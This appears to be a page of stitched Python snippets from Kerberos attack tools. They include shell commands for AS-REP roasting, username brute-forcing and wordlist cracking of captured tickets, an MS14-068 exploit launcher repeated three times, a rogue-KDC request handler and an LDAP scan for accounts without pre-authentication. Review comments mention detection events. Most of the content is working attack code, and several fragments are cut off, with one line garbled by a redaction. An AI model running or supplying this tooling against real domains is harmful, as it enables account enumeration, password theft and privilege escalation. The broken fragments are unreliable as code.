Example #1
    def do_net_get_tgs_rep(self, line):
        """Shell command: obtain or verify a TGS-REP for the configured user.

        Two modes, chosen by *line*:
          * ``<pkt> <plaintext_password>`` (any line of 3+ characters): the
            pasted TGS-REP ``pkt`` is checked offline, via ``crack_tgs_rep``,
            against the RC4-HMAC key derived from the NTLM hash of
            ``plaintext_password``.
          * empty/short line: with ``set_arg`` holding 'domain', 'username' and
            'dc', the user's SID is resolved, a TGT (krbtgt) is requested from
            the DC and then a service ticket for ``set_arg['target_service']``.
        ``set_arg['password']`` and ``set_arg['target_service']`` must be set
        beforehand; otherwise ``bad_cmd`` is reported. Returns None.
        """
	try:
            # RC4-HMAC key from the NTLM hash of the configured password. The bare
            # subscript on the next line exists only to raise KeyError when
            # 'target_service' has not been set.
            user_key = (RC4_HMAC, ntlm_hash(krbTricks.set_arg['password']).digest())
            krbTricks.set_arg['target_service']
        except:
            # Bare except: a missing setting is the intended case, but any other
            # failure (e.g. inside ntlm_hash) is reported the same way.
            krbTricks.bad_cmd(self, 'net_get_tgs_rep')
            return
        if len(line) >= 3:
            # Offline mode. split(' ', 1) raises an uncaught ValueError when the
            # line contains no space at all.
            pkt, plaintext_password = line.split(' ', 1)
            user_key = (RC4_HMAC, ntlm_hash(plaintext_password).digest())
            crack_tgs_rep(user_key, pkt, plaintext_password)
        elif 'domain' in krbTricks.set_arg and 'username' in krbTricks.set_arg and 'dc' in krbTricks.set_arg:
            try:
                # SID lookup first; presumably it stores the result in
                # set_arg['user_sid'], which is read a few lines below -- confirm.
                net_get_user_sid(krbTricks.set_arg['dc'], krbTricks.set_arg['username'], krbTricks.set_arg['domain'] , krbTricks.set_arg['password'], krbTricks.set_arg['username'])
                target_service = target_host = kdc_b = None
                user_realm = krbTricks.set_arg['domain']
                user_name = krbTricks.set_arg['username']
                target_realm = krbTricks.set_arg['domain']
                user_sid = krbTricks.set_arg['user_sid']
                target_service = "krbtgt"
                kdc_a = krbTricks.set_arg['dc']
                # 'pre' is raised around the two requests; net_get_tgs_rep is
                # defined elsewhere, so what it does with the flag is not visible
                # here. It stays True if the except branch below fires.
                krbTricks.set_arg['pre'] = True
                # First request: TGT for krbtgt in the user's own realm.
                net_get_tgs_rep(user_realm, user_name, user_sid, user_key, kdc_a, target_realm, target_service, target_host, krbtgt_a_key=None, trust_ab_key=None, target_key=None)
                # Second request: service ticket for the configured
                # '<service>/<realm>' target. A value without exactly one '/'
                # raises ValueError and lands in the generic error below.
                target_service,target_realm = krbTricks.set_arg['target_service'].split('/')
                net_get_tgs_rep(user_realm, user_name, user_sid, user_key, kdc_a, target_realm, target_service, target_host, krbtgt_a_key=None, trust_ab_key=None, target_key=None)
                #net_get_tgs_rep(user_realm, user_name, user_sid, user_key, kdc_a, kdc_b, target_service, target_host)
                krbTricks.set_arg['pre'] = False
            except:
                # Bare except: network errors, a missing 'user_sid' and a
                # malformed target all collapse into this one message.
                print(' Uh-oh, something went wrong :(')
                return
        else:
            krbTricks.bad_cmd(self, 'net_get_tgs_rep')
            return
Example #2
    def do_net_get_as_rep(self, line):
        """Shell command: request an AS-REP for the configured user without pre-auth.

        Needs ``set_arg`` to hold 'domain', 'username' and 'dc'. The request is
        sent through ``net_get_as_rep``; the reply is expected hex-encoded in
        ``set_arg['net_krbas']`` (presumably stored by that helper -- confirm)
        and is classified by its Kerberos message/error codes. Existing
        accounts are appended to ``krbTricks.loot``; when the KDC actually
        issued a ticket the reply is kept in the entry as 'krbas'. *line* is
        ignored. Returns None.
        """
        # todo dont apend if user exists
        krbTricks.set_arg['pre'] = False
        if 'domain' in krbTricks.set_arg and 'username' in krbTricks.set_arg and 'dc' in krbTricks.set_arg:
            if 'pre' in krbTricks.set_arg and 'password' in krbTricks.set_arg and 'user_sid' in krbTricks.set_arg:
                if krbTricks.set_arg['pre'] == True:
                    # NOTE(review): 'pre' was forced to False at the top of this
                    # method and nothing in between changes it, so this branch
                    # (padata-type 2 == PA-ENC-TIMESTAMP with the real password and
                    # SID) cannot be reached from this command.
                    krbTricks.set_arg['padata_type'] = 2
                    user_key = (RC4_HMAC, ntlm_hash(krbTricks.set_arg['password']).digest())
                    user_sid = krbTricks.set_arg['user_sid']
                else:
                    # No pre-auth: padata-type 149, a throwaway key derived from a
                    # single NUL byte, and a fixed placeholder SID.
                    krbTricks.set_arg['padata_type'] = 149
                    user_key = (RC4_HMAC, ntlm_hash("\x00").digest())
                    user_sid = 'S-1-5-21-3623811015-3361044348-30300820-1013'
            else:
                # Same no-pre-auth setup as the branch above (duplicated).
                krbTricks.set_arg['padata_type'] = 149
                user_key = (RC4_HMAC, ntlm_hash("\x00").digest())
                user_sid = 'S-1-5-21-3623811015-3361044348-30300820-1013'
            user_realm = krbTricks.set_arg['domain']
            user_name = krbTricks.set_arg['username']
            kdc_a = krbTricks.set_arg['dc']
            try:
                # Assigned but never used in this method.
                padata_type = krbTricks.set_arg['padata_type']
                net_get_as_rep(user_realm, user_name, user_sid, user_key, kdc_a)
                # Spec-less DER decode: only the components present in the reply
                # are indexed positionally. rep[1] is msg-type; rep[4] is taken
                # to be error-code of a KRB-ERROR, which holds when the optional
                # ctime/cusec fields are absent -- confirm.
                rep = decoder.decode(krbTricks.set_arg['net_krbas'].decode('hex'))[0]
                #print rep
                # 11 == AS-REP: a ticket was issued without pre-auth (typically an
                # account with DONT_REQ_PREAUTH). The reply is kept for offline
                # checking against a wordlist.
                if rep[1] == 11:
                    print "  [+] Got a valid AS-REP for %s... Done!" % user_name
                    krbTricks.loot.append({'user_name':user_name, 'domain':user_realm, 'target_service':'krbtgt', 'krbas':krbTricks.set_arg['net_krbas']})
                # The three rep[4] checks also run when rep was an AS-REP; they
                # simply do not match then (no elif).
                # 25 == KDC_ERR_PREAUTH_REQUIRED: account exists, pre-auth enforced.
                if rep[4] == 25:
                    print "  [-] Invalid AS-REP for %s... " % user_name
                    print "  [+] Got a valid user name (%s)... Done!" % user_name
                    krbTricks.loot.append({'user_name':user_name, 'domain':user_realm, 'target_service':'krbtgt' })
                # 18 == KDC_ERR_CLIENT_REVOKED: account exists but is locked/disabled.
                if rep[4] == 18:
                    print "  [-] Invalid AS-REP for %s... " % user_name
                    print "  [+] %s locked... Done!" % user_name
                    krbTricks.loot.append({'user_name':user_name, 'domain':user_realm, 'target_service':'krbtgt' })
                # 6 == KDC_ERR_C_PRINCIPAL_UNKNOWN: no such account; nothing recorded.
                if rep[4] == 6:
                    print "  [-] Not a valid user name (%s)... " % user_name
                    # principal unknown i.e. not a user
                    #krbTricks.loot.append({'user_name':user_name, 'domain':user_realm, 'krbas':krbTricks.set_arg['net_krbas']})
                krbTricks.set_arg['padata_type'] = ''
    #            print "\n #\tAS-REP\tUser"
    #           for idx, accts in enumerate(krbTricks.loot):
    #               if 'krbas' in accts:
    #                   gotasrep = 'Yes'
    #               else:
    #                   gotasrep = 'No'
    #               print "[%d]\t%s\t%s@%s" % (idx, gotasrep, accts['user_name'], accts['domain'])
    #               gotasrep = 'No'
                # NOTE(review): on the DC each of these requests is a TGT request
                # (event 4768); the no-pre-auth success case is logged with
                # Pre-Authentication Type 0, the usual detection hook -- confirm
                # against your audit policy.
                show('users')
            except:
                # Bare except: send failures, a missing 'net_krbas' and decode
                # errors all end up as this one generic message.
                print(' Uh-oh, something went wrong :(')
                return


        else:
            krbTricks.bad_cmd(self, 'net_get_as_rep')
            return
Example #3
    def do_crack_as_rep_manual(self, line):
        """Shell command: run the configured wordlist against one captured AS-REP.

        *line* is the index into ``krbTricks.loot`` of the entry to work on. An
        attempt is made only if that entry holds a 'krbas' blob and
        ``set_arg['wordlist']`` is configured. Each word's NTLM hash becomes an
        RC4-HMAC key for ``crack_as_rep``; the first word that fits is stored as
        the entry's 'password'. Always finishes by re-rendering the user table
        with ``show('users')``.
        """
        entry = krbTricks.loot[int(line)]
        if 'krbas' in entry and "wordlist" in krbTricks.set_arg:
            # Whole wordlist is read up front; the file object is left to the GC.
            candidates = [raw.rstrip('\n') for raw in open(krbTricks.set_arg['wordlist'])]
            for candidate in candidates:
                rc4_key = (RC4_HMAC, ntlm_hash(candidate).digest())
                if not crack_as_rep(rc4_key, entry['krbas'], candidate):
                    continue
                entry['password'] = candidate
                break
        show('users')
Example #4
    def do_crack_tgs_rep(self, line):
        """Shell command: run the configured wordlist against every captured TGS-REP.

        Walks ``krbTricks.loot``; an entry is attempted only if it carries a
        'krbtgs' blob, ``set_arg['wordlist']`` is configured and no 'password'
        has been recorded for it yet. Each candidate word's NTLM hash becomes an
        RC4-HMAC key for ``crack_tgs_rep``; the first word that fits is stored
        as the entry's 'password'. *line* is ignored. Finishes by re-rendering
        the user table with ``show('users')``.
        """
        for pos, entry in enumerate(krbTricks.loot):
            eligible = ('krbtgs' in entry
                        and "wordlist" in krbTricks.set_arg
                        and 'password' not in krbTricks.loot[pos])
            if not eligible:
                continue
            print " Trying to crack %s" % entry['user_name']
            # Wordlist is re-read for every entry; the file object is left to the GC.
            candidates = [raw.rstrip('\n') for raw in open(krbTricks.set_arg['wordlist'])]
            for candidate in candidates:
                rc4_key = (RC4_HMAC, ntlm_hash(candidate).digest())
                if not crack_tgs_rep(rc4_key, entry['krbtgs'], candidate):
                    continue
                krbTricks.loot[pos]['password'] = candidate
                break
        show('users')
Example #5
    def do_brute_no_pre_auth(self, line):
        """Shell command: probe every name in ``set_arg['userlist']`` with a no-pre-auth AS-REQ.

        For each username not already present in ``krbTricks.loot`` an AS-REQ
        without pre-authentication is sent to ``set_arg['dc']`` for realm
        ``set_arg['domain']``. The reply, expected hex-encoded in
        ``set_arg['net_krbas']`` (presumably stored by ``net_get_as_rep`` --
        confirm), is classified by its Kerberos codes and existing accounts are
        appended to the loot list; an actually issued ticket is kept as
        'krbas'. *line* is ignored. Returns None.
        """
        krbTricks.set_arg['pre'] = False
	try:
            # Whole user list read into memory; the file object is never closed
            # explicitly. Any failure (no 'userlist' setting, unreadable path) is
            # reported as a bad command.
            words = [f.rstrip('\n') for f in open(krbTricks.set_arg['userlist'])]
        except:
            krbTricks.bad_cmd(self, 'brute_no_pre_auth')
            return

        for user_name in words:
            # Re-checked on every iteration although nothing in the loop changes
            # it; a missing 'domain'/'dc' aborts on the first user.
            if 'domain' in krbTricks.set_arg and 'dc' in krbTricks.set_arg:
                # Names already in loot (matched on 'user_name') are skipped;
                # only an empty line is printed for them.
                if next((item for item in krbTricks.loot if item["user_name"] == user_name), None):
                    print ""
                else:
                    # No pre-auth: padata-type 149, a throwaway key derived from a
                    # single NUL byte and a fixed placeholder SID.
                    krbTricks.set_arg['padata_type'] = 149
                    user_key = (RC4_HMAC, ntlm_hash("\x00").digest())
                    user_sid = 'S-1-5-21-3623811015-3361044348-30300820-1013'
                    user_realm = krbTricks.set_arg['domain']
                    kdc_a = krbTricks.set_arg['dc']
                    # Assigned but never used here.
                    padata_type = krbTricks.set_arg['padata_type']
                    try:
                        net_get_as_rep(user_realm, user_name, user_sid, user_key, kdc_a)
                        
                    except:
			print(' can\'t send data to the DC ?\n')
                        # A send failure aborts the whole run: the remaining
                        # names are not tried and show('users') is not reached.
                        return
                    try:
                        krbTricks.set_arg['padata_type'] = ''
                        # Spec-less DER decode: only the components present in the
                        # reply are indexed. rep[1] is msg-type; rep[4] is taken to
                        # be error-code of a KRB-ERROR, which holds when the
                        # optional ctime/cusec are absent -- confirm.
                        rep = decoder.decode(krbTricks.set_arg['net_krbas'].decode('hex'))[0]
                        #if user_name not in enuberate(krbTricks.loot):
                        # 11 == AS-REP: ticket issued without pre-auth; keep the blob.
                        if rep[1] == 11:
                            krbTricks.loot.append({'user_name':user_name, 'domain':user_realm, 'target_service':'krbtgt', 'krbas':krbTricks.set_arg['net_krbas']})
                        # 25 == KDC_ERR_PREAUTH_REQUIRED: account exists.
                        if rep[4] == 25:
                            krbTricks.loot.append({'user_name':user_name, 'domain':user_realm, 'target_service':'krbtgt'})
                        # 18 == KDC_ERR_CLIENT_REVOKED: account exists, locked/disabled.
                        if rep[4] == 18:
                            krbTricks.loot.append({'user_name':user_name, 'domain':user_realm, 'target_service':'krbtgt'})
                        #if rep[4] == 6:
                            # principal unknown i.e. not a user
                            #krbTricks.loot.append({'user_name':user_name, 'domain':user_realm, 'krbas':krbTricks.set_arg['net_krbas']})
                    except:
                        # Bare except for a missing/undecodable reply. The message
                        # hard-codes "dc.onlyfor.hax" rather than the configured DC.
                        # NOTE(review): from the DC's side this loop is one TGT
                        # request (event 4768) per listed name, including failures
                        # for names it does not know -- the burst is the footprint
                        # to alert on; confirm against your audit policy.
                        print('  [+] Decoding AS-REP from dc.onlyfor.hax... No Ticket\n')

            else:
                krbTricks.bad_cmd(self, 'brute_no_pre_auth')
                return

        show('users')
Example #6
        print >> sys.stderr, '    -p <clearPassword>'
        print >> sys.stderr, ' --rc4 <ntlmHash>'
        sys.exit(1)

    opts, args = getopt(sys.argv[1:], 'u:s:d:p:', ['rc4='])
    opts = dict(opts)
    if not all(k in opts for k in ('-u', '-s', '-d')):
        usage_and_exit()

    user_name, user_realm = opts['-u'].split('@', 1)
    user_sid = opts['-s']
    kdc_a = opts['-d']

    if '--rc4' in opts:
        user_key = (RC4_HMAC, opts['--rc4'].decode('hex'))
        assert len(user_key[1]) == 16
    elif '-p' in opts:
        user_key = (RC4_HMAC, ntlm_hash(opts['-p']).digest())
    else:
        user_key = (RC4_HMAC, ntlm_hash(getpass('Password: '******'TGT_%s@%s.ccache' % (user_name, user_realm)

    user_realm = user_realm.upper()
    target_realm = target_realm.upper()

    sploit(user_realm, user_name, user_sid, user_key, kdc_a, kdc_b,
           target_realm, target_service, target_host, filename)
Example #7
def handleAsReq(data):
    """Build the reply this fake KDC sends for one DER-encoded AS-REQ.

    data: raw DER bytes of an AS-REQ (presumably one datagram -- confirm at the
    caller). Returns the DER encoding of a KRB-ERROR or an AS-REP:
      * no PA-ENC-TIMESTAMP pre-auth in the request -> KRB-ERROR 25
        (KDC_ERR_PREAUTH_REQUIRED)
      * sname kadmin/changepw -> AS-REP built with USER_EXP_KEY
      * pre-auth decrypts under one of ``valid_pws`` -> AS-REP under that key
      * anything else -> KRB-ERROR 23 (KDC_ERR_KEY_EXPIRED)
    ``valid_pws`` and ``buildAsRep`` are module-level and not visible here.
    """
    req = decode(data, asn1Spec=AsReq())[0]
    realm = str(req['req-body']['realm'])
    # Parsed but not used in this function.
    nonce = int(req['req-body']['nonce'])

    # Check if it has pre-auth; if not, send error
    # Only padata-type 2 (PA-ENC-TIMESTAMP) is recognised; its value is an
    # EncryptedData whose 'cipher' field is what gets decrypted below.
    preAuthData = None
    if req['padata'] != None:
       for padata in req['padata']:
           if padata['padata-type'] == 2:
               preAuthData = str(padata['padata-value'])
               preAuthData = decode(preAuthData, asn1Spec=EncryptedData())[0]
               preAuthData = str(preAuthData['cipher'])
               break

    if preAuthData == None:
        gt, ms = epoch2gt(time(), microseconds=True)
        # KRB-ERROR (msg-type 30) with error-code 25, echoing the client's
        # crealm/cname/sname back. Assigning None to 'cname'/'sname' presumably
        # instantiates the nested component before its fields are set (pyasn1
        # idiom) -- confirm.
        rep = KrbError()
        rep['pvno'] = 5
        rep['msg-type'] = 30
        rep['stime'] = gt
        rep['susec'] = ms
        rep['error-code'] = 25
        rep['crealm'] = realm
        rep['cname'] = None
        rep['cname']['name-type'] = int(req['req-body']['cname']['name-type'])
        rep['cname']['name-string'] = None
        rep['cname']['name-string'][0] = str(req['req-body']['cname']['name-string'][0])
        rep['realm'] = realm
        rep['sname'] = None
        rep['sname']['name-type'] = int(req['req-body']['sname']['name-type'])
        rep['sname']['name-string'] = None
        rep['sname']['name-string'][0] = str(req['req-body']['sname']['name-string'][0])
        rep['sname']['name-string'][1] = str(req['req-body']['sname']['name-string'][1])
        rep['e-text'] = 'Need to use PA-ENC-TIMESTAMP/PA-PK-AS-REQ'
        # Hard-coded DER blob for e-data; it looks like a METHOD-DATA advertising
        # pre-auth types and etype 23 (RC4-HMAC) -- decode it to confirm.
        rep['e-data'] = binascii.unhexlify('30613009a103020110a20204003009a10302010fa20204003009a103020102a2020400300aa1040202008aa2020400300aa10402020088a20204003012a10302010ba20b040930073005a0030201173012a103020113a20b040930073005a003020117')

        print "Replying with pre-auth required"
        return encode(rep)

    # Try to decode preAuthData with valid pws
    # Key usage 1 is the PA-ENC-TIMESTAMP usage. Presumably decrypt raises on a
    # bad key/checksum, which the bare except turns into "try the next one";
    # `decrypted` is never inspected. There is no break, so if several
    # passwords fit, the last one wins.
    preAuthIsValid = False
    preAuthIsValidPw = None
    for pw in valid_pws:
        try:
            decrypted = decrypt(RC4_HMAC, ntlm_hash(pw).digest(), 1, preAuthData)
            preAuthIsValid = True
            preAuthIsValidPw = (RC4_HMAC, ntlm_hash(pw).digest())
        except: pass

    print "Is using a valid pre-auth password: %s" % preAuthIsValid

    # Assumes a two-component sname; a one-component sname would likely raise here.
    sname = (str(req['req-body']['sname']['name-string'][0]), str(req['req-body']['sname']['name-string'][1]))
    if (sname[0] == 'kadmin' and sname[1] == 'changepw'):

        # Password-change service: always answered with a ticket keyed with
        # USER_EXP_KEY, regardless of whether the pre-auth was valid.
        rep = buildAsRep(req, USER_EXP_KEY)
        print "Replying with AS response for kadmin/changepw"

    else:

        if preAuthIsValid:
            rep = buildAsRep(req, preAuthIsValidPw)
            print "Replying with normal AS-REP"

        else:

            # KRB-ERROR 23 == KDC_ERR_KEY_EXPIRED, without e-text/e-data. A client
            # that trusts this KDC is presumably steered into its password-change
            # flow, i.e. the kadmin/changepw branch above -- confirm with a real
            # client. NOTE(review): a "KDC" answering every non-wordlist password
            # with error 23 is a distinctive fingerprint of this handler.
            gt, ms = epoch2gt(time(), microseconds=True)
            rep = KrbError()
            rep['pvno'] = 5
            rep['msg-type'] = 30
            rep['stime'] = gt
            rep['susec'] = ms
            rep['error-code'] = 23
            rep['crealm'] = realm
            rep['cname'] = None
            rep['cname']['name-type'] = int(req['req-body']['cname']['name-type'])
            rep['cname']['name-string'] = None
            rep['cname']['name-string'][0] = str(req['req-body']['cname']['name-string'][0])
            rep['realm'] = realm
            rep['sname'] = None
            rep['sname']['name-type'] = int(req['req-body']['sname']['name-type'])
            rep['sname']['name-string'] = None
            rep['sname']['name-string'][0] = str(req['req-body']['sname']['name-string'][0])
            rep['sname']['name-string'][1] = str(req['req-body']['sname']['name-string'][1])

            print "Replying with password expired error"

    return encode(rep)
Example #8
from twisted.internet.protocol import DatagramProtocol
from twisted.internet import protocol, reactor, endpoints

from pyasn1.codec.der.encoder import encode
from pyasn1.codec.der.decoder import decode
from pyasn1.type.char import GeneralString
from pyasn1.type.univ import Integer, Sequence, SequenceOf, OctetString, BitString, Boolean
from pyasn1.type.namedtype import NamedTypes, NamedType, OptionalNamedType

from kek.krb5 import _c, application, AsReq, APReq, Authenticator, KerberosTime, Realm, PrincipalName, AsRep, NT_PRINCIPAL, NT_SRV_INST, EncTicketPart, EncASRepPart, EncryptedData, HostAddress, Microseconds, EncryptionKey, TgsReq, EncTGSRepPart, TgsRep
from kek.util import epoch2gt, gt2epoch
from kek.crypto import RC4_HMAC, encrypt, decrypt, ntlm_hash

# RC4-HMAC long-term key with a fixed 16-byte value (not password-derived).
# Not referenced in the code visible here; presumably the krbtgt key used when
# tickets are built -- confirm in buildAsRep. `binascii` is not in the visible
# import block above, so it must be imported further up.
KRBTGT_KEY = (RC4_HMAC, binascii.unhexlify('0468cebdfc8a86e2578dca9406309611'))
# RC4-HMAC key derived from the NTLM hash of the one-character password 'a';
# handleAsReq (on this page) uses it for every kadmin/changepw AS-REP.
USER_EXP_KEY = (RC4_HMAC, ntlm_hash('a').digest())

class KrbError(Sequence):
    tagSet = application(30)
    componentType = NamedTypes(
        NamedType('pvno', _c(0, Integer())),
        NamedType('msg-type', _c(1, Integer())),
        OptionalNamedType('ctime', _c(2, KerberosTime())),
        OptionalNamedType('cusec', _c(3, Integer())),
        NamedType('stime', _c(4, KerberosTime())),
        NamedType('susec', _c(5, Integer())),
        NamedType('error-code', _c(6, Integer())),
        OptionalNamedType('crealm', _c(7, Realm())),
        OptionalNamedType('cname', _c(8, PrincipalName())),
        NamedType('realm', _c(9, Realm())),
        NamedType('sname', _c(10, PrincipalName())),
        print >> sys.stderr, 'OPTIONS:'
        print >> sys.stderr, '    -p <clearPassword>'
        print >> sys.stderr, ' --rc4 <ntlmHash>'
        sys.exit(1)
 
    opts, args = getopt(sys.argv[1:], 'u:s:d:p:', ['rc4='])
    opts = dict(opts)
    if not all(k in opts for k in ('-u', '-s', '-d')):
        usage_and_exit()
 
    user_name, user_realm = opts['-u'].split('@', 1)
    user_sid = opts['-s']
    kdc_a = opts['-d']
 
    if '--rc4' in opts:
        user_key = (RC4_HMAC, opts['--rc4'].decode('hex'))
        assert len(user_key[1]) == 16
    elif '-p' in opts:
        user_key = (RC4_HMAC, ntlm_hash(opts['-p']).digest())
    else:
        user_key = (RC4_HMAC, ntlm_hash(getpass('Password: '******'TGT_%s@%s.ccache' % (user_name, user_realm)
 
    user_realm = user_realm.upper()
    target_realm = target_realm.upper()
 
    sploit(user_realm, user_name, user_sid, user_key, kdc_a, kdc_b, target_realm, target_service, target_host, filename)
Example #10
def handleAsReq(data):
    """Build the reply this fake KDC sends for one DER-encoded AS-REQ.

    data: raw DER bytes of an AS-REQ (presumably one datagram -- confirm at the
    caller). Returns the DER encoding of a KRB-ERROR or an AS-REP:
      * no PA-ENC-TIMESTAMP pre-auth in the request -> KRB-ERROR 25
        (KDC_ERR_PREAUTH_REQUIRED)
      * sname kadmin/changepw -> AS-REP built with USER_EXP_KEY
      * pre-auth decrypts under one of ``valid_pws`` -> AS-REP under that key
      * anything else -> KRB-ERROR 23 (KDC_ERR_KEY_EXPIRED)
    ``valid_pws`` and ``buildAsRep`` are module-level and not visible here.
    """
    req = decode(data, asn1Spec=AsReq())[0]
    realm = str(req['req-body']['realm'])
    # Parsed but not used in this function.
    nonce = int(req['req-body']['nonce'])

    # Check if it has pre-auth; if not, send error
    # Only padata-type 2 (PA-ENC-TIMESTAMP) is recognised; its value is an
    # EncryptedData whose 'cipher' field is what gets decrypted below.
    preAuthData = None
    if req['padata'] != None:
        for padata in req['padata']:
            if padata['padata-type'] == 2:
                preAuthData = str(padata['padata-value'])
                preAuthData = decode(preAuthData, asn1Spec=EncryptedData())[0]
                preAuthData = str(preAuthData['cipher'])
                break

    if preAuthData == None:
        gt, ms = epoch2gt(time(), microseconds=True)
        # KRB-ERROR (msg-type 30) with error-code 25, echoing the client's
        # crealm/cname/sname back. Assigning None to 'cname'/'sname' presumably
        # instantiates the nested component before its fields are set (pyasn1
        # idiom) -- confirm.
        rep = KrbError()
        rep['pvno'] = 5
        rep['msg-type'] = 30
        rep['stime'] = gt
        rep['susec'] = ms
        rep['error-code'] = 25
        rep['crealm'] = realm
        rep['cname'] = None
        rep['cname']['name-type'] = int(req['req-body']['cname']['name-type'])
        rep['cname']['name-string'] = None
        rep['cname']['name-string'][0] = str(
            req['req-body']['cname']['name-string'][0])
        rep['realm'] = realm
        rep['sname'] = None
        rep['sname']['name-type'] = int(req['req-body']['sname']['name-type'])
        rep['sname']['name-string'] = None
        rep['sname']['name-string'][0] = str(
            req['req-body']['sname']['name-string'][0])
        rep['sname']['name-string'][1] = str(
            req['req-body']['sname']['name-string'][1])
        rep['e-text'] = 'Need to use PA-ENC-TIMESTAMP/PA-PK-AS-REQ'
        # Hard-coded DER blob for e-data; it looks like a METHOD-DATA advertising
        # pre-auth types and etype 23 (RC4-HMAC) -- decode it to confirm.
        rep['e-data'] = binascii.unhexlify(
            '30613009a103020110a20204003009a10302010fa20204003009a103020102a2020400300aa1040202008aa2020400300aa10402020088a20204003012a10302010ba20b040930073005a0030201173012a103020113a20b040930073005a003020117'
        )

        print "Replying with pre-auth required"
        return encode(rep)

    # Try to decode preAuthData with valid pws
    # Key usage 1 is the PA-ENC-TIMESTAMP usage. Presumably decrypt raises on a
    # bad key/checksum, which the bare except turns into "try the next one";
    # `decrypted` is never inspected. There is no break, so if several
    # passwords fit, the last one wins.
    preAuthIsValid = False
    preAuthIsValidPw = None
    for pw in valid_pws:
        try:
            decrypted = decrypt(RC4_HMAC,
                                ntlm_hash(pw).digest(), 1, preAuthData)
            preAuthIsValid = True
            preAuthIsValidPw = (RC4_HMAC, ntlm_hash(pw).digest())
        except:
            pass

    print "Is using a valid pre-auth password: %s" % preAuthIsValid

    # Assumes a two-component sname; a one-component sname would likely raise here.
    sname = (str(req['req-body']['sname']['name-string'][0]),
             str(req['req-body']['sname']['name-string'][1]))
    if (sname[0] == 'kadmin' and sname[1] == 'changepw'):

        # Password-change service: always answered with a ticket keyed with
        # USER_EXP_KEY, regardless of whether the pre-auth was valid.
        rep = buildAsRep(req, USER_EXP_KEY)
        print "Replying with AS response for kadmin/changepw"

    else:

        if preAuthIsValid:
            rep = buildAsRep(req, preAuthIsValidPw)
            print "Replying with normal AS-REP"

        else:

            # KRB-ERROR 23 == KDC_ERR_KEY_EXPIRED, without e-text/e-data. A client
            # that trusts this KDC is presumably steered into its password-change
            # flow, i.e. the kadmin/changepw branch above -- confirm with a real
            # client. NOTE(review): a "KDC" answering every non-wordlist password
            # with error 23 is a distinctive fingerprint of this handler.
            gt, ms = epoch2gt(time(), microseconds=True)
            rep = KrbError()
            rep['pvno'] = 5
            rep['msg-type'] = 30
            rep['stime'] = gt
            rep['susec'] = ms
            rep['error-code'] = 23
            rep['crealm'] = realm
            rep['cname'] = None
            rep['cname']['name-type'] = int(
                req['req-body']['cname']['name-type'])
            rep['cname']['name-string'] = None
            rep['cname']['name-string'][0] = str(
                req['req-body']['cname']['name-string'][0])
            rep['realm'] = realm
            rep['sname'] = None
            rep['sname']['name-type'] = int(
                req['req-body']['sname']['name-type'])
            rep['sname']['name-string'] = None
            rep['sname']['name-string'][0] = str(
                req['req-body']['sname']['name-string'][0])
            rep['sname']['name-string'][1] = str(
                req['req-body']['sname']['name-string'][1])

            print "Replying with password expired error"

    return encode(rep)
Example #11
from twisted.internet.protocol import DatagramProtocol
from twisted.internet import protocol, reactor, endpoints

from pyasn1.codec.der.encoder import encode
from pyasn1.codec.der.decoder import decode
from pyasn1.type.char import GeneralString
from pyasn1.type.univ import Integer, Sequence, SequenceOf, OctetString, BitString, Boolean
from pyasn1.type.namedtype import NamedTypes, NamedType, OptionalNamedType

from kek.krb5 import _c, application, AsReq, APReq, Authenticator, KerberosTime, Realm, PrincipalName, AsRep, NT_PRINCIPAL, NT_SRV_INST, EncTicketPart, EncASRepPart, EncryptedData, HostAddress, Microseconds, EncryptionKey, TgsReq, EncTGSRepPart, TgsRep
from kek.util import epoch2gt, gt2epoch
from kek.crypto import RC4_HMAC, encrypt, decrypt, ntlm_hash

# RC4-HMAC long-term key with a fixed 16-byte value (not password-derived).
# Not referenced in the code visible here; presumably the krbtgt key used when
# tickets are built -- confirm in buildAsRep. `binascii` is not in the visible
# import block above, so it must be imported further up.
KRBTGT_KEY = (RC4_HMAC, binascii.unhexlify('0468cebdfc8a86e2578dca9406309611'))
# RC4-HMAC key derived from the NTLM hash of the one-character password 'a';
# handleAsReq (on this page) uses it for every kadmin/changepw AS-REP.
USER_EXP_KEY = (RC4_HMAC, ntlm_hash('a').digest())


class KrbError(Sequence):
    tagSet = application(30)
    componentType = NamedTypes(
        NamedType('pvno', _c(0, Integer())),
        NamedType('msg-type', _c(1, Integer())),
        OptionalNamedType('ctime', _c(2, KerberosTime())),
        OptionalNamedType('cusec', _c(3, Integer())),
        NamedType('stime', _c(4, KerberosTime())),
        NamedType('susec', _c(5, Integer())),
        NamedType('error-code', _c(6, Integer())),
        OptionalNamedType('crealm', _c(7, Realm())),
        OptionalNamedType('cname', _c(8, PrincipalName())),
        NamedType('realm', _c(9, Realm())),
Example #12
        print >> sys.stderr, "OPTIONS:"
        print >> sys.stderr, "    -p <clearPassword>"
        print >> sys.stderr, " --rc4 <ntlmHash>"
        sys.exit(1)

    opts, args = getopt(sys.argv[1:], "u:s:d:p:", ["rc4="])
    opts = dict(opts)
    if not all(k in opts for k in ("-u", "-s", "-d")):
        usage_and_exit()

    user_name, user_realm = opts["-u"].split("@", 1)
    user_sid = opts["-s"]
    kdc_a = opts["-d"]

    if "--rc4" in opts:
        user_key = (RC4_HMAC, opts["--rc4"].decode("hex"))
        assert len(user_key[1]) == 16
    elif "-p" in opts:
        user_key = (RC4_HMAC, ntlm_hash(opts["-p"]).digest())
    else:
        user_key = (RC4_HMAC, ntlm_hash(getpass("Password: "******"TGT_%s@%s.ccache" % (user_name, user_realm)

    user_realm = user_realm.upper()
    target_realm = target_realm.upper()

    sploit(user_realm, user_name, user_sid, user_key, kdc_a, kdc_b, target_realm, target_service, target_host, filename)
Example #13
def scan_ldap_no_pre_auth(dc, bindusername, binddomain, bindpass):
    """List accounts under the Users container with a fixed userAccountControl value and probe each with a no-pre-auth AS-REQ.

    dc: LDAP host, also used as the KDC for the AS-REQs.
    bindusername, binddomain, bindpass: credentials for the LDAP simple bind;
        binddomain also forms the search base and is used as the Kerberos realm.
    Side effects: prints one line per account plus selected attributes, sends
    one AS-REQ per account, appends results to ``krbTricks.loot`` and
    re-renders the user table. LDAP errors are printed and swallowed.
    Returns None.
    """
# todo fix filter, currently static 
    # UPN-style bind DN. The base DN is the default Users container only, so
    # accounts living in other OUs are never returned.
    binddn = bindusername+'@'+binddomain
    basedn = "cn=users"
    for d in binddomain.split('.'):
        basedn += ", dc="+d

    try:
        # Try and make a synchronous bind
        # Plain (non-TLS) connection plus simple bind: bindpass crosses the
        # network in cleartext.
        conn = ldap.open(dc)
        conn.simple_bind_s(binddn,bindpass)

        # Search information
        scope = ldap.SCOPE_SUBTREE

